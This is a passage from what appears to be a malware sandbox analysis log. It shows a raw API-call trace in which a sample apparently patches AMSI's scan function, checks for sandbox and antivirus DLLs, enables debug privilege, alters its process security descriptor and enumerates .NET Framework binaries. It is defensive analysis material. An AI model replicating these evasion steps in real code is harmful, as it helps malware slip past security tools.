"c:\\windows\\syswow64\\windows.storage.dll") Region: id = 407 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 408 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 409 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 410 start_va = 0x21d0000 end_va = 0x21d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021d0000" filename = "" Region: id = 411 start_va = 0x21e0000 end_va = 0x21f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 412 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 413 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 414 start_va = 0x2200000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Thread: id = 1 os_tid = 0x13a0 [0089.836] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0090.079] RoInitialize () returned 0x1 [0090.079] RoUninitialize () returned 0x0 [0092.069] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x63a00, lpName=0x0) returned 0x25c [0092.070] memcpy (in: _Dst=0x22b0000, _Src=0x34d3d38, _Size=0x63a00 | out: _Dst=0x22b0000) returned 0x22b0000 [0092.074] CloseHandle (hObject=0x25c) returned 1 [0092.346] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x19d0a0 | out: phkResult=0x19d0a0*=0x0) returned 0x2 [0092.385] EtwEventRegister (in: ProviderId=0x23469e4, EnableCallback=0x48a05be, CallbackContext=0x0, RegHandle=0x23469c0 | out: RegHandle=0x23469c0) returned 0x0 [0092.389] EtwEventSetInformation (RegHandle=0x669298, InformationClass=0x24, EventInformation=0x2, InformationLength=0x234691c) returned 0x0 [0092.553] LocalAlloc (uFlags=0x0, uBytes=0x28958) returned 0x67f4b0 [0092.565] RtlMoveMemory (in: Destination=0x67f4b0, Source=0x22da254, Length=0x28958 | out: Destination=0x67f4b0) [0094.256] CoCreateGuid (in: pguid=0x19cf40 | out: pguid=0x19cf40*(Data1=0x3fa5a1e5, Data2=0xcbb9, Data3=0x4ba1, Data4=([0]=0xa2, [1]=0xb4, [2]=0x61, [3]=0x40, [4]=0x25, [5]=0xf2, [6]=0x6e, [7]=0x5c))) returned 0x0 [0100.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="amsi.dll", cchWideChar=8, lpMultiByteStr=0x19eacc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="amsi.dllÿö\x93", lpUsedDefaultChar=0x0) returned 8 [0100.310] LoadLibraryA (lpLibFileName="amsi.dll") returned 0x6e8f0000 [0100.487] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AmsiScanBuffer", cchWideChar=14, lpMultiByteStr=0x19eac8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AmsiScanBuffer\x93", lpUsedDefaultChar=0x0) returned 14 [0100.488] GetProcAddress (hModule=0x6e8f0000, lpProcName="AmsiScanBuffer") returned 0x6e8f4020 [0100.585] VirtualProtect (in: lpAddress=0x6e8f4020, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x235af74 | out: lpflOldProtect=0x235af74*=0x20) returned 1 [0100.587] VirtualProtect (in: lpAddress=0x6e8f4020, dwSize=0x8, flNewProtect=0x20, lpflOldProtect=0x235af80 | out: lpflOldProtect=0x235af80*=0x40) returned 1 [0100.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SbieDll.dll", cchWideChar=11, lpMultiByteStr=0x19eac8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SbieDll.dlloÿö\x93", lpUsedDefaultChar=0x0) returned 11 [0100.616] GetModuleHandleA (lpModuleName="SbieDll.dll") returned 0x0 [0100.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SxIn.dll", cchWideChar=8, lpMultiByteStr=0x19eacc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SxIn.dllÿö\x93", lpUsedDefaultChar=0x0) returned 8 [0100.626] GetModuleHandleA (lpModuleName="SxIn.dll") returned 0x0 [0100.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Sf2.dll", cchWideChar=7, lpMultiByteStr=0x19eacc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sf2.dlloÿö\x93", lpUsedDefaultChar=0x0) returned 7 [0100.626] GetModuleHandleA (lpModuleName="Sf2.dll") returned 0x0 [0100.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="snxhk.dll", cchWideChar=9, lpMultiByteStr=0x19eacc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="snxhk.dllö\x93", lpUsedDefaultChar=0x0) returned 9 [0100.627] GetModuleHandleA (lpModuleName="snxhk.dll") returned 0x0 [0100.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmdvrt32.dll", cchWideChar=12, lpMultiByteStr=0x19eac8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmdvrt32.dllÿö\x93", lpUsedDefaultChar=0x0) returned 12 [0100.627] GetModuleHandleA (lpModuleName="cmdvrt32.dll") returned 0x0 [0100.676] GetCurrentProcessId () returned 0x139c [0100.689] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19e41c | out: lpLuid=0x19e41c*(LowPart=0x14, HighPart=0)) returned 1 [0100.691] GetCurrentProcess () returned 0xffffffff [0100.692] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19e418 | out: TokenHandle=0x19e418*=0x2a0) returned 1 [0100.694] AdjustTokenPrivileges (in: TokenHandle=0x2a0, DisableAllPrivileges=0, NewState=0x236f738*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0100.695] CloseHandle (hObject=0x2a0) returned 1 [0100.844] EnumProcesses (in: lpidProcess=0x236ff1c, cb=0x400, lpcbNeeded=0x19eb00 | out: lpidProcess=0x236ff1c, lpcbNeeded=0x19eb00) returned 1 [0100.954] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x139c) returned 0x2a0 [0100.955] GetExitCodeProcess (in: hProcess=0x2a0, lpExitCode=0x2370538 | out: lpExitCode=0x2370538*=0x103) returned 1 [0101.058] GetKernelObjectSecurity (in: Handle=0x2a0, RequestedInformation=0x4, pSecurityDescriptor=0x23707c8, nLength=0x0, lpnLengthNeeded=0x235b088 | out: pSecurityDescriptor=0x23707c8, lpnLengthNeeded=0x235b088) returned 0 [0101.059] GetKernelObjectSecurity (in: Handle=0x2a0, RequestedInformation=0x4, pSecurityDescriptor=0x2372828, nLength=0x64, lpnLengthNeeded=0x235b088 | out: pSecurityDescriptor=0x2372828, lpnLengthNeeded=0x235b088) returned 1 [0101.075] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2373600, cbSid=0x19eb30 | out: pSid=0x2373600*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x19eb30) returned 1 [0101.105] SetKernelObjectSecurity (Handle=0x2a0, SecurityInformation=0x4, SecurityDescriptor=0x23740f8) returned 1 [0101.111] CloseHandle (hObject=0x2a0) returned 1 [0101.111] EnumProcesses (in: lpidProcess=0x23748e4, cb=0x400, lpcbNeeded=0x19eb00 | out: lpidProcess=0x23748e4, lpcbNeeded=0x19eb00) returned 1 [0101.115] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x139c) returned 0x2a0 [0101.115] GetExitCodeProcess (in: hProcess=0x2a0, lpExitCode=0x2374f00 | out: lpExitCode=0x2374f00*=0x103) returned 1 [0101.115] GetKernelObjectSecurity (in: Handle=0x2a0, RequestedInformation=0x4, pSecurityDescriptor=0x2375040, nLength=0x0, lpnLengthNeeded=0x235b088 | out: pSecurityDescriptor=0x2375040, lpnLengthNeeded=0x235b088) returned 0 [0101.115] GetKernelObjectSecurity (in: Handle=0x2a0, RequestedInformation=0x4, pSecurityDescriptor=0x23754bc, nLength=0x78, lpnLengthNeeded=0x235b088 | out: pSecurityDescriptor=0x23754bc, lpnLengthNeeded=0x235b088) returned 1 [0101.116] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2375d30, cbSid=0x19eb30 | out: pSid=0x2375d30*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x19eb30) returned 1 [0101.116] SetKernelObjectSecurity (Handle=0x2a0, SecurityInformation=0x4, SecurityDescriptor=0x2376074) returned 1 [0101.116] CloseHandle (hObject=0x2a0) returned 1 [0101.295] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19eb3c | out: pfEnabled=0x19eb3c) returned 0x0 [0101.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19e54c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0101.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eadc) returned 1 [0101.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19e59c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0101.685] FindFirstFileW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\*.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\*.exe"), lpFindFileData=0x19e804 | out: lpFindFileData=0x19e804*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920c5b8e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x920c5b8e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x920c6f3e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInProcess.exe", cAlternateFileName="")) returned 0x678658 [0101.686] FindClose (in: hFindFile=0x678658 | out: hFindFile=0x678658) returned 1 [0101.688] FindFirstFileW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\*" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\*"), lpFindFileData=0x19e7bc | out: lpFindFileData=0x19e7bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c227, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd4bc93bd, ftLastAccessTime.dwHighDateTime=0x1d8a73b, ftLastWriteTime.dwLowDateTime=0xd4cfa8b8, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x678d18 [0101.689] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c227, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd4bc93bd, ftLastAccessTime.dwHighDateTime=0x1d8a73b, ftLastWriteTime.dwLowDateTime=0xd4cfa8b8, ftLastWriteTime.dwHighDateTime=0x1d8a73b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.692] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c227, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa559fcee, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xa559fcee, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0101.692] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de7cd72, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8de7cd72, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8de7e0f4, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x8cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility.dll", cAlternateFileName="")) returned 1 [0101.692] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920c5b8e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x920c5b8e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x920c6f3e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInProcess.exe", cAlternateFileName="")) returned 1 [0101.693] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5505d3cf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5505d3cf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5505d3cf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInProcess.exe.config", cAlternateFileName="")) returned 1 [0101.693] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91ed8946, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91ed8946, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91ed9cd8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa4c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInProcess32.exe", cAlternateFileName="")) returned 1 [0101.693] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61c826cf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61c826cf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61c826cf, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInProcess32.exe.config", cAlternateFileName="")) returned 1 [0101.693] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919ec2a8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x919ec2a8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x919ed670, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa6a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInUtil.exe", cAlternateFileName="")) returned 1 [0101.693] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55010f1a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x55010f1a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x55010f1a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa1, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddInUtil.exe.config", cAlternateFileName="")) returned 1 [0101.694] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd395af, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd395af, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd3bcdb, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2a6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdoNetDiag.dll", cAlternateFileName="")) returned 1 [0101.694] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61cf4dd6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61cf4dd6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61cf4dd6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d66, dwReserved0=0x0, dwReserved1=0x0, cFileName="adonetdiag.mof", cAlternateFileName="")) returned 1 [0101.694] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61cf4dd6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61cf4dd6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61cf4dd6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="adonetdiag.mof.uninstall", cAlternateFileName="")) returned 1 [0101.695] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bb85fa, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91bb85fa, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91bb9979, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1ee98, dwReserved0=0x0, dwReserved1=0x0, cFileName="alink.dll", cAlternateFileName="")) returned 1 [0101.695] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91be31e0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91be31e0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91be4528, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x182a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLaunch.exe", cAlternateFileName="")) returned 1 [0101.695] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ebcd76, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97a89f7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97a89f7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x119, dwReserved0=0x0, dwReserved1=0x0, cFileName="applaunch.exe.config", cAlternateFileName="APPLAU~1.CON")) returned 1 [0101.695] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c227, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x53818a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x53818a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ASP.NETWebAdminFiles", cAlternateFileName="ASP~1.NET")) returned 1 [0101.696] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ebcd76, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97a89f7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97a89f7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aspnet.config", cAlternateFileName="ASPNET~1.CON")) returned 1 [0101.696] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e29a539, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e29a539, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e29b87c, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xd8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_compiler.exe", cAlternateFileName="")) returned 1 [0101.696] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x920c482a, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x920c482a, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x920c482a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x8ab8, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_filter.dll", cAlternateFileName="")) returned 1 [0101.696] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dc14f45, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dc14f45, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dc162de, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x64b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_isapi.dll", cAlternateFileName="")) returned 1 [0101.697] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92299580, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x92299580, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x92299580, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa6b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aspnet_perf.dll", cAlternateFileName="")) returned 1 [0101.697] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61cf4dd6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x61cf4dd6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x61cf4dd6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1c09, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_perf.h", cAlternateFileName="")) returned 1 [0101.697] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6126070c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6126070c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6126070c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf387a, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_perf.ini", cAlternateFileName="")) returned 1 [0101.697] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6126070c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x6126070c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x6126070c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf30d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_perf2.ini", cAlternateFileName="")) returned 1 [0101.697] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df54ea5, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8df54ea5, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8df5623d, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x164a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_rc.dll", cAlternateFileName="")) returned 1 [0101.698] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd4f542, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd4f542, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd4f542, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb0d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aspnet_regbrowsers.exe", cAlternateFileName="")) returned 1 [0101.698] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e21545f, ftCreationTime.dwHighDateTime=0x1d8a73a, 